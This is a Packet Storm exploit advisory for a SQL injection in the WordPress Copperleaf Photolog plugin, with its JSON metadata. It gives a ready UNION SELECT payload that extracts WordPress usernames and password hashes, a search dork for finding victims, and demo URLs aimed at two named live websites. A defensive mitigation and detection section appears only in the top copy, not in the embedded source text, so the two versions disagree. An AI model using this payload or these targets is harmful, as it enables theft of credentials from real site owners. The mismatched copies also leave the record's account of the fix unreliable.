ID PACKETSTORM:86315
Type packetstorm
Reporter kaMtiEz
Modified 2010-02-15T00:00:00
Description
`#############################################################################################################
## WordPress Copperleaf Photolog SQL injection ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 15 February, 2009 ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://www.copperleaf.org/
[+] Download : http://www.copperleaf.org/wp-content/code/cpl0.16.zip
[+] version : 0.16 / lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/wp-content/plugins/cpl/cplphoto.php?postid=[INDONESIANCODER]&id=[VALID ID]
[ XpL]
+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--
[ DEMO ]
[+] Demo Vendor
http://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2097
[+] Demo plugins
http://ozarkedgewildflowers.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11
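[ FIX ]
dunno :">
[+] No vendor patch is referenced in this advisory. In the examples above the payload is appended to the numeric postid parameter of cplphoto.php, so the query is presumably built from that value without validation or escaping.
[+] Mitigation : cast postid and id to integers (intval() / absint()) and build the query with $wpdb->prepare() placeholders instead of string concatenation. Until the code is fixed, disable the plugin/theme file or reject non-numeric postid and id values at the web server or WAF.
[+] Detection : review access logs for requests to cplphoto.php whose postid or id contains "union", "select" or "wp_users". If any are found, treat the wp_users password hashes as exposed and reset the affected accounts.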
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBl13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] r3m1ck : look at this .. hha
[+] Don Tukulesto : kapan maen lage ?
[+] d0ntcry : semangat br0th .. belajar terusssss ...
[ QUOTE ]
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
`
{"reporter": "kaMtiEz", "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2016-11-03T10:26:51"}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:51"}, "vulnersScore": 0.8}, "published": "2010-02-15T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:26:51", "history": [], "id": "PACKETSTORM:86315", "sourceHref": "https://packetstormsecurity.com/files/download/86315/wpcopperleaf-sql.txt", "objectVersion": "1.2", "sourceData": "`############################################################################################################# \n## WordPress Copperleaf Photolog SQL injection ## \n## Author : kaMtiEz (kamzcrew@yahoo.com) ## \n## Homepage : http://www.indonesiancoder.com ## \n## Date : 15 February, 2009 ## \n############################################################################################################# \n \n[ Software Information ] \n \n[+] Vendor : http://www.copperleaf.org/ \n[+] Download : http://www.copperleaf.org/wp-content/code/cpl0.16.zip \n[+] version : 0.16 / lower maybe also affected \n[+] Vulnerability : SQL \n[+] Dork : \"CiHuY\" \n[+] LOCATION : INDONESIA - JOGJA \n############################################################################################################# \n \n[ Vulnerable File ] \n \nhttp://127.0.0.1/[kaMtiEz]/wp-content/plugins/cpl/cplphoto.php?postid=[INDONESIANCODER]&id=[VALID ID] \n \n[ XpL] \n \n+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users-- \n \n[ DEMO ] \n \n[+] Demo Vendor \n \nhttp://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2097 \n \n[+] Demo plugins \n \nhttp://ozarkedgewildflowers.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11 \n \n[ FIX ] \n \ndunno :\"> \n \n 
\n############################################################################################################# \n \n[ Thx TO ] \n \n[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah \n[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot \n[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBl13Z,r3m1ck \n[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk \n \n[ NOTE ] \n \n[+] r3m1ck : look at this .. hha \n[+] Don Tukulesto : kapan maen lage ? \n[+] d0ntcry : semangat br0th .. belajar terusssss ... \n \n[ QUOTE ] \n \n[+] we are not dead INDONESIANCODER stil r0x \n[+] nothing secure .. \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "WordPress Copperleaf Photolog SQL Injection", "type": "packetstorm", "modified": "2010-02-15T00:00:00", "hash": "794fdfdfabc10efdfd6317e65c8a8931a3213afed93862ad9d543a5610805492", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "f0955e4c667d429b365743ab9d4b1947", "key": "href"}, {"hash": "d3957b28e6c201d6d37ecd69e45c911b", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "d3957b28e6c201d6d37ecd69e45c911b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5dc9e8838629249a8b21d61ebfeb42d7", "key": "reporter"}, {"hash": "ecc1ca8ebe97fc6f212289b66cf5aa0e", "key": "sourceData"}, {"hash": "53a3746259235d3be48963ceeac9816d", "key": "sourceHref"}, {"hash": "db4c138ca9b9da087bd93d4e7d2a05b7", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": 
"https://packetstormsecurity.com/files/86315/WordPress-Copperleaf-Photolog-SQL-Injection.html", "viewCount": 2}
{}